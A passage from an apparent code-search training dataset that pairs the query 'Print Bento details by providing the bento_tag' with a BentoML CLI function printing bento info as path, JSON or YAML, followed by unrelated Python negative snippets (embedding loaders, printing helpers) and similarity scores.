"def loadw2v(embfile, embsize, myzipfile=None, maxvoc=None):\n word_to_ix = {}\n word_to_ix[constants.PAD_ITEM] = 0\n word_to_ix[constants.UNK_ITEM] = 1\n # fill padding word with zeros\n model = [[0.]*embsize]\n # fill unk word with random numbers\n model.append(np.random.normal(0,0.15,size=embsize).tolist())\n if myzipfile != None:\n zip = zipfile.ZipFile(myzipfile, 'r')\n f = zip.read(embfile).split(\"\\n\")\n else:\n #f = open(embfile, 'r')\n f = codecs.open(embfile, \"r\", \"utf-8\")\n ix = 2\n for line in f:\n if maxvoc!=None:\n if ix >= maxvoc:\n break\n splitLine = line.split()\n if(len(splitLine)>embsize+1):\n phrase_lst = splitLine[:-embsize]\n word = ' '.join(phrase_lst)\n embedding = [float(val) for val in splitLine[-embsize:]]\n word_to_ix[word] = ix\n model.append(embedding)\n ix += 1\n elif(len(splitLine)>2):\n word = splitLine[0]\n embedding = [float(val) for val in splitLine[1:]]\n word_to_ix[word]=ix\n model.append(embedding)\n ix += 1\n else:\n print(line)\n print(\"%d words loaded!\" % len(model))\n return word_to_ix, model",
"def load_vocabulary():\n global vocabulary_list, vocabulary_dict\n vocabulary_list = []\n vocabulary_dict = {}\n\n with open(_VOCABULARY_PATH, 'r') as f:\n for index, line in enumerate(f):\n line = line.strip()\n vocabulary_dict[line] = index\n vocabulary_list.append(line)",
"def gather_and_save_vectors(path, words_vec = collections.defaultdict(list), features = []):\n with open(path, 'rt', encoding='mac_roman') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=' ', quotechar='\"')\n for row in csvreader:\n words_vec, features = countize(row[3], row[2], words_vec, features)\n try:\n words_vec, features = countize(row[6], row[2], words_vec, features)\n except:\n pass\n pickle.dump(words_vec, open(\"ind_vectors.data\", \"wb\"))\n pickle.dump(features, open(\"i_features.data\", \"wb\"))\n return words_vec, features",
"def construct_dict(self):\n i = 0\n self.word2idx = dict()\n fi = open(self.config.word_vec_fi_glove, 'r')\n\n for line in fi:\n self.word2idx[line.split(\" \")[0]] = i\n i += 1\n\n self.vocab_size = i\n self.write_dict()\n fi.close()",
"def load_words(): \r\n return lw.load_words()",
"def load_bin_vec(filename):\n w2v = {}\n with open(filename, 'r') as f:\n header = f.readline()\n vocab_size, emb_size = map(int, header.split())\n for line in f:\n cline = line.split()\n w2v[cline[0]] = np.array(cline[1:], dtype=np.float64)\n return w2v, emb_size, vocab_size",
"def load_word2vec_model():\n model = Word2Vec.load_word2vec_format('GoogleNews-vectors-negative300.bin', binary=True, norm_only=True)\n return model",
"def create_vocabulary(sentences, path):\n print('creating vocab..')\n\n word_dict = dict(); vocabulary = dict()\n for sentence in sentences:\n for word in nltk.word_tokenize(sentence):\n if word not in word_dict:\n word_dict[word] = ''\n word_dict['<s>'] = ''\n word_dict['</s>'] = ''\n\n with open(path, encoding=\"utf8\") as f:\n for line in f:\n word, vec = line.split(' ', 1)\n if word in word_dict:\n vocabulary[word] = np.fromstring(vec, sep=' ')\n\n print('vocabulary was created successfully!')\n return vocabulary",
"def load_embeddings(path):\r\n\r\n embeds = dict() # dictionary mapping words to vectors\r\n for line in open(path, encoding='utf-8'):\r\n row = line.strip().split('\\t')\r\n embeds[row[0]] = np.array(row[1:], dtype=np.float32)\r\n\r\n embeddings_dim = embeds[list(embeds)[0]].shape[0]\r\n\r\n return embeds, embeddings_dim",
"def load_embeddings(filename):\n count = 0\n matrix = []\n word_map = {}\n with open(filename, encoding=\"utf8\") as f:\n # with open(filename) as f:\n for line in f:\n line = line.strip()\n items = line.split()\n word = items[0]\n rest = items[1:]\n # print(\"word:\", word)\n word_map[word] = count\n count += 1\n\n rest = list(map(float, rest))\n matrix.append(rest)\n matrix = np.array(matrix)\n return word_map, matrix",
"def extract_word2vec(fichier, words_indices): \n \n word2vec={} #\n \n #\n with open(fichier,\"r\",encoding=\"utf-8\") as file:\n for line in file:\n line = line.replace(\" \\n\",\"\").split(\" \")\n # Lecture des informations du fichier\n # nombre de mots presents et nombre de features\n if len(line)==2 :\n nb_words=int(line[0])\n nb_feats=int(line[1])\n \n #\n else:\n if line[0] in words_indices:\n word, vec = line[0],np.array(line[1:])\n word2vec[word]=vec\n\n print(\"{} embbedings de taille {} pertinent parmi les {} du fichier\".format(len(word2vec), nb_feats, nb_words))\n\n return word2vec, nb_feats",
"def load_pretrained_words_data(embeddings_filename, vocab):\n words = dict()\n emb_dim = None\n with gzip.open(cached_path(embeddings_filename), 'rb') as embeddings_file:\n for line in embeddings_file:\n fields = line.decode('utf-8').strip().split(' ')\n if len(fields) == 0:\n continue\n word = fields[0]\n if emb_dim is None:\n emb_dim = len(fields) - 1\n if emb_dim < 10: # my pretrained file is poisonous 😭\n emb_dim = None\n else:\n assert emb_dim == len(fields) - 1, \"{}, {}\".format(emb_dim, len(fields) - 1)\n words.update({word: [float(i) for i in fields[1:]]})\n print(\"Embedding dim: {}\".format(emb_dim))\n tokens = vocab.get_index_to_token_vocabulary(\"tokens\")\n n_tokens = len(tokens)\n data = []\n for i in tokens:\n if tokens[i] in words:\n data.append(words[tokens[i]])\n else:\n data.append([0] * emb_dim)\n return torch.tensor(data), emb_dim",
"def load_vocab(self, fn):\n vocab = load_vocab(fn)\n self.vocab = vocab\n self.has_vocab = True",
"def loadData():\n\tprint \"Loading POS vectorized reviews\"\n\twith open(DATA_PATH, \"rb\") as data_file:\n\t\tdata = cPickle.load(data_file)\n\treturn data",
"def load_word2vec_en_pretrained():\r\n log.info(\"Load W2V Model\")\r\n model = api.load(\"glove-wiki-gigaword-50\")\r\n return PreTrainedGensimEN(model)",
"def load_target_vocab(self):\n vocab = [line.split()[0] for line in open(os.path.join('preprocessed', 'all_vocab.txt'), 'r').read().splitlines()]\n self.word2idx = {word: idx for idx, word in enumerate(vocab)}\n self.idx2word = {idx: word for idx, word in enumerate(vocab)}\n self.vocab_size = len(self.word2idx)",
"def load_pre_trained_vector_array(pre_trained_vectors_file, normalize=True):\n vectors = {}\n word_to_index = {}\n with gzip.open(pre_trained_vectors_file, 'rt', encoding='utf8', errors='raise') as file_in:\n word_index = 0\n for line in file_in:\n values = line.rstrip().split(' ')\n word = values[0]\n vectors[word] = [float(x) for x in values[1:]]\n if word != '<unk>':\n word_to_index[word] = word_index\n word_index += 1\n index_to_word = {i: w for w, i in word_to_index.items()}\n return _get_vectors(vectors, word_to_index, index_to_word, normalize), word_to_index, index_to_word",
"def load_glove(self, path, vocab_size=None, dim=None, reserve_zero=True, reserve_oov_token=True):\n\n # Infer vocab size by reading number of lines\n if vocab_size is None:\n vocab_size = 0\n with open(path, 'r') as f:\n for line in f:\n vocab_size += 1\n\n # Infer vector dim by reading a single line\n if dim is None:\n with open(path, 'r') as f:\n dim = len(f.readline().split(u' ')) - 1\n\n words = []\n\n self.allow_oov = reserve_oov_token\n self.reserve_zero = reserve_zero\n\n if self.reserve_zero:\n words.append('__ZERO__')\n if self.allow_oov:\n words.append('__OUT_OF_VOCAB__')\n self.oov_index = len(words) - 1\n\n self._matrix = np.zeros((vocab_size+len(words), dim))\n # Assign random vector for OOV token if it exists\n if \"__OUT_OF_VOCAB__\" in words:\n self._matrix[self.oov_index] = np.random.randn(dim, )\n\n update = words.append # Speedup\n with open(path, 'r') as f:\n for i in tqdm(range(len(words), self.matrix.shape[0])):\n split = f.readline().split(u' ', 1)\n update(split[0])\n self._matrix[i] = np.fromstring(split[1], 'f', sep=u' ')\n\n self.vocab = words",
"def glove_embedding(self, texts, file):\n self.embedding_dict = dict()\n glove_file = open(file, encoding='utf-8')\n for line in glove_file:\n word_vector = line.split()\n word = word_vector[0]\n word_vector_arr = np.asarray(word_vector[1:], dtype='float32')\n self.embedding_dict[word] = word_vector_arr\n glove_file.close()\n \n i = 0\n with pgb.ProgressBar(max_value=len(texts)) as bar:\n for text in texts:\n vec = []\n text = text.split()\n for t in text:\n try:\n vec.append(self.embedding_dict[t.lower()])\n except KeyError:\n pass\n ## There are no matched words\n if len(vec) == 0:\n print(\"len 0 vec\")\n self.word_vec.append(np.zeros((100)))\n else:\n #print(np.array(vec))\n #print(np.array(vec).shape)\n sentence = self.sentence_vec(np.array(vec))\n #print(sentence)\n #print(sentence.shape)\n self.word_vec.append(sentence)\n i += 1\n bar.update(i)\n self.word_vec = np.array(self.word_vec)\n print(self.word_vec.shape)",
"def vectorize(self,clean_path):\n \n #load pretrained embedding model (GloVe)\n glove = spacy.load('en_core_web_lg')\n #extract unique words (aka vocabulary)\n unique_words = set()\n for d in self.docs: \n txt = d.text\n doc = glove(txt)\n for word in doc: \n if word.has_vector:\n unique_words.add(word.text)\n #change set to list type\n unique_words = list(unique_words)\n #save vector representation\n word_vectors = np.array([glove(word).vector for word in unique_words if glove(word).has_vector])\n #index vectors by corresponding word \n corpus_vectors = pd.DataFrame(word_vectors, index=unique_words)\n with open(clean_path + 'corpus_vectors.pkl', 'wb') as f:\n pickle.dump(corpus_vectors,f)\n self.vectors = corpus_vectors\n print('Saved embedding vectors.')\n return",
"def load_embeddings(self, str_file):\n\n with open(str_file, 'rb') as f_read:\n self.embeddings_entity = pickle.load(f_read)\n self.embeddings_relation = pickle.load(f_read)\n self.dict_paras = pickle.load(f_read)"
] | [
"0.7791548",
"0.72534555",
"0.72064674",
"0.7057689",
"0.7057665",
"0.7002823",
"0.6931613",
"0.68834174",
"0.6871142",
"0.6848353",
"0.6788099",
"0.67114586",
"0.66740996",
"0.6664656",
"0.66422987",
"0.66346234",
"0.6607083",
"0.6605387",
"0.65846086",
"0.65806603",
"0.6566823",
"0.65596646",
"0.6506629",
"0.6472431",
"0.64723456",
"0.6464267",
"0.6462529",
"0.6442341",
"0.64398634",
"0.64314306",
"0.6415282",
"0.6412817",
"0.64055413",
"0.6397267",
"0.63649577",
"0.6359486",
"0.6357812",
"0.630708",
"0.6306844",
"0.6306844",
"0.6287034",
"0.6284496",
"0.6282652",
"0.62809384",
"0.62775403",
"0.627609",
"0.627609",
"0.6248722",
"0.62371",
"0.62332183",
"0.62292427",
"0.6224259",
"0.6220833",
"0.62112397",
"0.62043905",
"0.6183441",
"0.6177345",
"0.6148398",
"0.6138987",
"0.61367595",
"0.6133708",
"0.61315227",
"0.6128918",
"0.6125864",
"0.6121823",
"0.61214197",
"0.6114165",
"0.6109445",
"0.60953474",
"0.60933805",
"0.60850745",
"0.6081149",
"0.60749274",
"0.6057515",
"0.6052783",
"0.60507745",
"0.60471046",
"0.60435355",
"0.6039067",
"0.603368",
"0.60328203",
"0.60221773",
"0.6013095",
"0.60007405",
"0.5999903",
"0.5999048",
"0.5997936",
"0.59918404",
"0.5977796",
"0.5969003",
"0.59505683",
"0.5937666",
"0.59337145",
"0.5930212",
"0.5927906",
"0.592368",
"0.5921867",
"0.591842",
"0.5905716",
"0.58937156"
] | 0.68163615 | 10 |
Print Bento details by providing the bento_tag. \b | def get(bento_tag: str, output: str) -> None: # type: ignore (not accessed)
bento = bento_store.get(bento_tag)
if output == "path":
console.print(bento.path)
elif output == "json":
info = json.dumps(bento.info.to_dict(), indent=2, default=str)
console.print_json(info)
else:
info = yaml.dump(bento.info, indent=2, sort_keys=False)
console.print(Syntax(info, "yaml")) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def print_tags():\n for tag in Tag.query.all():\n print tag.__repr__()",
"def __gitDescribeTag(self):\n self.vcs.gitDescribe(self.project.getProjectPath(), [])",
"def show_target(self, target):\n print \" \" + repr(target.subject) \\\n + \" \" + target.meaning \\\n + \" \" + target.verb \\\n + \" \" + repr(target.object)",
"def print(self):\r\n self.print_avec_separateur()",
"def printme(self, line):\n self.otag.printme(line)",
"def print_cwb(document, tag='<s>'):\n\n doc = NLP(document)\n for sentence in doc.sents:\n print(tag)\n\n sent = NLP(sentence.text)\n for token in sent:\n print('{word}\\t{pos}\\t{lemma}'.format(\n word=token.text,\n pos=token.pos_,\n lemma=token.lemma_))\n\n print(tag.replace('<', '</'))",
"async def info(self, ctx: \"IceTeaContext\", *, otag: TagConverter):\n tag: models.Tag = otag\n if not tag.alias:\n embed = discord.Embed(description=f\"{ctx.message.guild.name} ``{tag.title}`` tag information\")\n user = ctx.guild.get_member(tag.author)\n embed.set_author(name=user.display_name, icon_url=user.avatar_url)\n embed.add_field(name=\"Tag name\", value=tag.title)\n embed.add_field(name=\"Amount used\", value=str(tag.count))\n embed.timestamp = tag.created\n await ctx.send(embed=embed)\n else:\n embed = discord.Embed(description=f\"{ctx.message.guild.name} ``{tag.title}`` alias information\")\n user = ctx.guild.get_member(tag.author)\n embed.add_field(name=\"Author\", value=user or \"Unknown\")\n embed.add_field(name=\"Amount used\", value=str(tag.count))\n embed.timestamp = tag.created\n await ctx.send(embed=embed)",
"def book_info(self):\n print(\"ID : \", self.ID,\n \"\\nName : \", self.name,\n \"\\nAuthor : \", self.author,\n \"\\nGenre : \", self.genre,\n \"\\nPrice : \", self.price,\n \"\\nQuantity of this book : \", self.quantity)",
"def pretty_print_entity(entity: tg.tl.TLObject) -> str:\n\n return bprint.bprint(entity, stream=str, skip_predicate=_bprint_skip_predicate)",
"def get(self, bento_name, bento_version):",
"def _print(self, *args, **kwargs) -> None:\n # Only print in verbose mode\n if self._verbose:\n arglist = list(args)\n arglist[0] = f\"[buddy-{self._experiment_name}] {args[0]}\"\n print(*arglist, **kwargs)",
"def list_bentos(bento_name: str, output: str) -> None: # type: ignore (not accessed)\n bentos = bento_store.list(bento_name)\n res = [\n {\n \"tag\": str(bento.tag),\n \"path\": display_path_under_home(bento.path),\n \"size\": human_readable_size(calc_dir_size(bento.path)),\n \"creation_time\": bento.info.creation_time.astimezone().strftime(\n \"%Y-%m-%d %H:%M:%S\"\n ),\n }\n for bento in sorted(\n bentos, key=lambda x: x.info.creation_time, reverse=True\n )\n ]\n\n if output == \"json\":\n info = json.dumps(res, indent=2)\n console.print(info)\n elif output == \"yaml\":\n info = yaml.safe_dump(res, indent=2)\n console.print(Syntax(info, \"yaml\"))\n else:\n table = Table(box=None)\n table.add_column(\"Tag\")\n table.add_column(\"Size\")\n table.add_column(\"Creation Time\")\n table.add_column(\"Path\")\n for bento in res:\n table.add_row(\n bento[\"tag\"],\n bento[\"size\"],\n bento[\"creation_time\"],\n bento[\"path\"],\n )\n console.print(table)",
"def print_item(group):\n print(\"\\tName: {}\".format(group.name))\n print(\"\\tId: {}\".format(group.id))\n print(\"\\tLocation: {}\".format(group.location))\n print(\"\\tTags: {}\".format(group.tags))\n if hasattr(group, 'status'):\n print(\"\\tStatus: {}\".format(group.status))\n if hasattr(group, 'state'): # Site\n print(\"\\tStatus: {}\".format(group.state))\n if hasattr(group, 'properties'):\n print_properties(group.properties)\n print(\"\\n\\n\")",
"def print_obs(self,obs):\n print(obs)",
"def export(bento_tag: str, out_path: str) -> None: # type: ignore (not accessed)\n bento = bento_store.get(bento_tag)\n out_path = bento.export(out_path)\n logger.info(\"%s exported to %s.\", bento, out_path)",
"def _show(self, indent = 0):\n print(\" \"*indent, \"Name:\", self.name)\n print(\" \"*indent, \"Description:\", self.description)",
"def print_verbose(self) -> None:\n print(self)\n if self.meta is not None:\n print(self.meta.__repr__())",
"def Print(self):\n\n\t\tif self.verbose:\n\n\t\t print (\"\\033[1m[HEADER]\\033[0m\")\n\t\t print (\"code:\\t\\t%s\" % self.kod)\n\t \tprint (\"version:\\t%s\" % self.ver)\n\t\t print (\"date and time:\\t%s\" % self.probid)\n\t\t print (\"dump number:\\t%s\" % self.knod)\n\t \tprint (\"number of histories:\\t%s\" % self.nps)\n\t\t print (\"number of pseudorandom numbers used:\\t%s\" % self.rnr)\n\t\t print (\"title: %s\" % self.title)\n\n\t\t if self.ntal>1:\n\t\t\t\tprint self.ntal, 'tallies:', self.ntals\n\t \telse:\n\t\t\t\tprint self.ntal, 'tally:', self.ntals\n\n\n\t\t if self.npert != 0:\n\t\t\t\tprint(\"number of perturbations: %s\" % self.npert)",
"def print_object_details(obj: object) -> None:\n print_section(obj, 'Type', print_type)\n print_section(obj, 'Documentation', print_documentation)\n print_section(obj, 'Attributes', print_attributes)\n print_section(obj, 'Methods', print_methods)\n print_section_delimiter()",
"def verbose(self, block: Block):\n print('\\n\\n==============================')\n print('Hash:\\t\\t', block.hash.hexdigest())\n print('Previous Hash:\\t', block.previous_hash.hexdigest())\n print('Nounce:\\t\\t', block.nonce)\n print('Data:\\t\\t', block.data)\n print('\\n\\n==============================')",
"def print_element(self):\n print(\"{selector}\\n{el_path}\\n{selector}\\n{el_source}\\n{selector}\\n\\n\"\n \"\".format(selector=\"--------\",\n el_path=self.save_path,\n el_source=self.text))",
"def print_operation(operations):\n for operation in operations:\n print ' ',\n change_color_by_tag(operation)\n if operation['ExtAttributes']:\n print_extattributes_of_member(operation['ExtAttributes'])\n print operation['Type'],\n if operation['Arguments']:\n print operation['Name'],\n print_argument(operation['Arguments'])\n else:\n print operation['Name']",
"def __str__(self):\n\n return \"[b:{} t:{}]\".format(self.obtem_bag_pass(), self.obtem_ciclo_in())",
"def displayhook(self, obj):\n # reproduce the behavior of the standard displayhook, not printing None\n if obj is not None:\n print >> self.stdout, repr(obj)",
"def __repr__(self):\n if self.bo is None:\n s = \"<BOFeature:%s not attached to bo!>\" % (self.name) \n else:\n s = \"<BOFeature:%s attached to %s>\" % (self.name, self.bo)\n return(s)",
"def print_item(group):\n print(\"\\tName: {}\".format(group.name))\n print(\"\\tId: {}\".format(group.id))\n print(\"\\tLocation: {}\".format(group.location))\n print(\"\\tTags: {}\".format(group.tags))\n if hasattr(group, 'properties'):\n print_properties(group.properties)",
"def print(self):\n size_bid = len(self.bid)\n size_offer = len(self.offer)\n print(\"Book[%s]: %d bids, %d offers --> mid @ %f\" % (self.security,\n size_bid, size_offer, self.mid()))\n print(\"{0: ^32} | {1: ^32}\".format(\"bid\", \"offer\"))\n print(\"{0:^10},{1:^10},{2:^10} | {3:^10}, {4:^10}, {5:^10}\".format(\n \"count\", \"qty\", \"price\", \"price\", \"qty\", \"count\"))\n\n empty_level = OrderBookLevel(\"-\", \"-\", \"-\")\n for i in range(max(size_bid, size_offer)):\n bid = self.bid[-(i+1)] if i < size_bid else empty_level\n offer = self.offer[i] if i < size_offer else empty_level\n print(\"{0:^10},{1:^10},{2:^10} | {3:^10}, {4:^10}, {5:^10}\".format(\n bid.order_count, bid.qty, bid.price, offer.price, offer.qty, offer.order_count))",
"def bbs_show_banner(tn, short = True):\n lines = cmd.lban(tn, short_banner = short)\n for line in lines:\n print(filter_tags(line))",
"def tagger():",
"def print(self):\n self.print_avec_separateur(\" \")",
"def print_state(self):\n print(self.type,\n self.persons[0].identifier,\n self.persons[1].identifier)",
"def debug_print(self):\n os.system('cls' if os.name == 'nt' else 'clear')\n\n print('\\nPosition')\n print(self.tetromino.position())\n print('\\nBlock coordinates')\n print(self.tetromino.block_coordinates())\n print('\\nBoard')\n print(self.board)\n print('\\nBoard heights')\n print(self.board.get_height())\n\n if self.pause:\n print('\\nPaused')",
"def status(self, indent=0):\n spaces = ' ' * (indent + 2)\n try:\n print(\"%s%s:\" % (' ' * indent, self.__class__.__name__))\n\n flags = []\n if self.__generated:\n flags.append(\"generated\")\n if self.air is None:\n flags.append(\"deleted\")\n\n flagStr = \"\"\n if len(flags) > 0:\n flagStr = \" (%s)\" % (\" \".join(flags))\n\n print(\"%sfrom DistributedObject doId:%s, parent:%s, zone:%s%s\" % (\n spaces, self.doId, self.parentId, self.zoneId, flagStr))\n except Exception as e:\n print(\"%serror printing status %s\" % (spaces, e))",
"def _print_custom(self):\n pass",
"async def get_pretty_vetoes(self) -> typing.List[str]:\n\n open_bills = await self.bot.db.fetch(\n \"SELECT id, name, link, link FROM bill WHERE is_vetoable = true AND status = $1 ORDER BY id\",\n models.BillPassedLegislature.flag.value,\n )\n\n if not open_bills:\n return []\n\n pretty_bills = []\n b_ids = []\n b_hyperlinks = []\n\n for record in open_bills:\n b_ids.append(f\"Bill #{record['id']}\")\n b_hyperlinks.append(\n f\"=HYPERLINK(\\\"{record['link']}\\\"; \\\"{record['name']}\\\")\"\n )\n pretty_bills.append(\n f\"Bill #{record['id']} - [{record['name']}]({record['link']})\"\n )\n\n exported = [\n f\"Export of Veto-able Bills -- {discord.utils.utcnow().strftime('%c')}\\n\\n\\n\",\n \"----- Veto-able Bills -----\\n\",\n ]\n\n exported.extend(b_ids)\n exported.append(\"\\n\")\n exported.extend(b_hyperlinks)\n\n link = await self.bot.make_paste(\"\\n\".join(exported))\n\n if link:\n pretty_bills.insert(\n 0,\n f\"[*View this list in Google Spreadsheets formatting for easy copy & pasting*]({link})\\n\",\n )\n\n return pretty_bills",
"def br(cls):\n term_width = get_terminal_width()\n\n if hasattr(cls, 'info'):\n cls.info('-' * term_width)\n else:\n print('-' * term_width)",
"def Dragon_Blade(self):\t\t\n\t\tprint(self.name.Title() + \" Dragon blade!\")",
"def debug_print(self):\n print self.title\n print self.storyline\n print self.poster_image_url\n print self.trailer_youtube_url\n print \"------\"",
"def dump(self, tag=None):\n return self.dump_to(sys.stdout.buffer, tag=tag)",
"def __repr__(self):\n price_trailing_diff = self.get('price_trailing_diff')\n if self.bo is None:\n s = \"<BOFeature:%s not attached to bo!>\" % (self.name) \n else:\n s = \"<BOFeature:%s price_diff=%s attached to bo#%s>\" % (self.name, price_trailing_diff, self.bo.ticket)\n return(s)",
"def biv_info(biv_id):\n b = biv.load_obj(biv_id)\n print(str(b))\n for k in b.__table__.columns:\n k = k.name\n print('{:>24} = {}'.format(k, getattr(b, k)))",
"def print_cell_information(obj_ase_cell):\n # print the lattice vectors\n print('a1=',obj_ase_cell.cell[0,:])\n print('a2=',obj_ase_cell.cell[1,:])\n print('a3=',obj_ase_cell.cell[2,:])\n for i,a in enumerate(obj_ase_cell):\n print(i,a.symbol,a.position)",
"def detailedInfo(cls):\n return 'tbd'",
"def detailedInfo(cls):\n return 'tbd'",
"def print_transactions_for_review(self, budget: Budget) -> None:\n print(f'Please review the following transactions in the {budget.name} '\n f'budget:')\n transactions = self.get_transactions_by_budget(budget.category)\n for transaction in transactions:\n print(transaction)",
"def printTweet(descr, tweet):\n\tprint(descr)\n\tprint(\"Username: %s\" % t.username)\n\tprint(\"Retweets: %d\" % t.retweets)\n\tprint(\"Text: %s\" % t.text)\n\tprint(\"Mentions: %s\" % t.mentions)\n\tprint(\"Hashtags: %s\\n\" % t.hashtags)",
"def tell(self):\n print('Name {}, Age {}'. format(self.name, self.age), end=\" \")",
"def pull(bento_tag: str, force: bool) -> None: # type: ignore (not accessed)\n yatai_client.pull_bento(bento_tag, force=force)",
"def print_post():\n print('| | |'),",
"def func(self):\n if not self.args:\n return self.display_tags()\n super(CmdArxTag, self).func()",
"def print_info(task_state, video_state):\n os.system('clear')\n\n # instructions\n blue_bg('\\n Instructions ')\n orange_fg('\\u21e6 / \\u21e8:\\t', '1 frame back/forward')\n orange_fg('\\u21e9 / \\u21e7:\\t', '10 frame back/forward')\n orange_fg('< / >:\\t', '100 frame back/forward')\n orange_fg('[ / ]:\\t', 'Previous/next task/video')\n orange_fg('Esc:\\t', 'Exit')\n orange_fg('0-9:\\t', 'Action ID')\n orange_fg('t / i:\\t', '[User Input] Jump to Task/Image ID')\n orange_fg('Space:\\t', 'Toggle text color')\n orange_fg('Tab:\\t', 'Toggle lookahead mode')\n red_fg('Note:\\t', '(a) Select image as active window (b) Turn off Caps Lock (c) Do not press shift key')\n\n # state information\n blue_bg('\\n State ')\n orange_fg('Video ID: ', '{}\\t'.format(task_state.tasks[task_state.task_idx]), newline=False)\n orange_fg('Frame ID: ', '{}'.format(video_state.get_image_name()))\n orange_fg('Image ID: ', '{}/{}'.format(video_state.image_idx + 1, video_state.num_frames))\n orange_fg('Action ID: ', video_state.get_image_label())\n\n # action dictionary and key mapping\n blue_bg('\\n Actions List ')\n for a, action in enumerate(task_state.actions):\n orange_fg('Action {}: '.format(a + 1), action)\n\n # annotations\n blue_bg('\\n Actions Record ')\n for frame_idx, (f, a) in enumerate(video_state.labels.items()):\n orange_fg('Label {}: '.format(frame_idx + 1), '{} --> {}'.format(f, a))",
"def display(self):\r\n\t\ts = self.options['space']\r\n\t\tv = self.level\r\n\t\tp = self.options['sep']\r\n\t\tt = self.options['tab']\r\n\t\tb = self.options['bullet']\r\n\t\tprint(v*t+b+s+self.abbrev+s+p+s+self.text)",
"def pretty_print_drt(self):\n self.drt_manager.pretty_print_drt()",
"def _printable(self):\n pass",
"def display_bag_info(bag_name):\n\n \"\"\" Get the bag file summary info \"\"\"\n bag_info = yaml.load(subprocess.Popen(\n ['rosbag', 'info', '--yaml', bag_name], stdout=subprocess.PIPE).communicate()[0])\n\n \"\"\" Get the topics in the bag \"\"\"\n bag_topics = bag_info['topics']\n bag = rosbag.Bag(bag_name)\n\n \"\"\" For every topic in the bag, display its fields. Only do this once per topic \"\"\"\n for topic in bag_topics:\n for _, msg, _ in bag.read_messages(topics=topic['topic']):\n \"\"\" Recursively list the fields in each message \"\"\"\n print_topic_fields(topic['topic'], msg, 0)\n print('')\n break\n\n bag.close()\n\n sys.stdout.write(\"Found %u topics\\n\" % len(bag_topics))",
"def __str__(self):\n return str(self.tag)",
"def printer(obj, ident=''):\n import inspect\n print ident + obj.__class__.__name__.upper()\n ident += ' '\n lists = []\n for name in dir(obj):\n elem = getattr(obj, name)\n if isinstance(elem, list) and name != u'decoded_content':\n lists.append(elem)\n elif not inspect.ismethod(elem):\n if not name.startswith('__'):\n if name == u'data' and elem:\n print ident + u'data = '\n printer(elem, ident + ' ')\n else:\n print ident + u'%s\\t= %s' % (name, getattr(obj, name))\n for l in lists:\n for i in l:\n printer(i, ident + ' ')",
"def printer(obj, ident=''):\n import inspect\n print ident + obj.__class__.__name__.upper()\n ident += ' '\n lists = []\n for name in dir(obj):\n elem = getattr(obj, name)\n if isinstance(elem, list) and name != u'decoded_content':\n lists.append(elem)\n elif not inspect.ismethod(elem):\n if not name.startswith('__'):\n if name == u'data' and elem:\n print ident + u'data = '\n printer(elem, ident + ' ')\n else:\n print ident + u'%s\\t= %s' % (name, getattr(obj, name))\n for l in lists:\n for i in l:\n printer(i, ident + ' ')",
"def print_cbt(msg: str, color: str = \"\", bright: bool = False, tag: str = \"\", end=\"\\n\"):\n brgt = Style.BRIGHT if bright else \"\"\n\n if not isinstance(tag, str):\n raise pyrado.TypeErr(given=tag, expected_type=str)\n else:\n if tag != \"\":\n tag = f\"[{tag}] \"\n\n color = color.lower()\n if color in [\"\", \"w\", \"white\"]:\n print(brgt + tag + msg + Style.RESET_ALL, end=end)\n elif color in [\"y\", \"yellow\"]:\n print(Fore.YELLOW + brgt + tag + msg + Style.RESET_ALL, end=end)\n elif color in [\"b\", \"blue\"]:\n print(Fore.BLUE + brgt + tag + msg + Style.RESET_ALL, end=end)\n elif color in [\"g\", \"green\"]:\n print(Fore.GREEN + brgt + tag + msg + Style.RESET_ALL, end=end)\n elif color in [\"r\", \"red\"]:\n print(Fore.RED + brgt + tag + msg + Style.RESET_ALL, end=end)\n elif color in [\"c\", \"cyan\"]:\n print(Fore.CYAN + brgt + tag + msg + Style.RESET_ALL, end=end)\n else:\n raise pyrado.ValueErr(given=color, eq_constraint=\"'y', 'b', 'g', 'r', or 'c'\")",
"def execute_print_chain(arg):\n blockchain = Blockchain()\n blockchain.read_blockchain()\n blockchain.print_blocks()",
"def info(releaser):\n click.echo(\"\\n\".join(releaser.get_info()))",
"async def slashtag_info(self, ctx: commands.Context, *, tag: TagConverter):\n await tag.send_info(ctx)",
"async def info(self, ctx, *, tag):\n try:\n self.fetch_tag(ctx, tag)\n except Exception as error:\n return await ctx.send(error)\n data = self._tag_dict[ctx.guild.id][tag]\n author = self.bot.get_user(data['author']) or await self.bot.fetch_user(data['author'])\n embed = discord.Embed(colour=self.bot.colour)\n embed.title = tag\n embed.description = f\"<:author:734991429843157042> **{author}**\\n\"\n embed.description += f\"Uses: **{data['uses']}**\\n\"\n embed.description += f\"ID: **{data['id']}**\"\n embed.set_author(name=str(author), icon_url=author.avatar_url)\n await ctx.send(embed=embed)",
"def display_log(obj, title=None, show=False):\n print(obj)",
"def output_debug_info(self):",
"def print_item(self, tabs=1):\n \n print(\"\\n\\tOrder Item Id: %s\" % self.metadata['itemId'])\n print(\"\\tOrder Id: %s\" % self.metadata['orderId'])\n print(\"\\tRecord Id: %s\" % self.metadata['recordId'])\n for m, v in self.metadata.items():\n if m == 'itemId' or m == 'orderId' or m == 'recordId': continue\n print(\"%s%s: %s\" % (str('\\t' * tabs), m, v))",
"def printme_text(self, line):\n self.otag.printme_text(line)",
"def printer(self, dictionary_db):\n tf = \"tf : %s\" % self.tf\n # insert the tf line before the idf\n s = self.word_info(dictionary_db).__str__().split(\"\\n\")\n r = s[:3] + [tf] + [s[-1]]\n return \"\\n\".join(r)",
"def do_show(self, arg):\n obj = self.verify(arg, 1)\n if obj:\n print(obj)",
"def print_account(account):\r\n markets_output = \"\"\r\n for market in account.get_market_segments():\r\n markets_output += market.name.strip(\"\\'\") + \", \"\r\n markets_output = markets_output.strip(\"\\'\")\r\n print(f'{account.name} ({markets_output[:-2]}): {account.get_sales_rep()}')",
"def PrettyPrint(self):\r\n print(self.data)\r\n return",
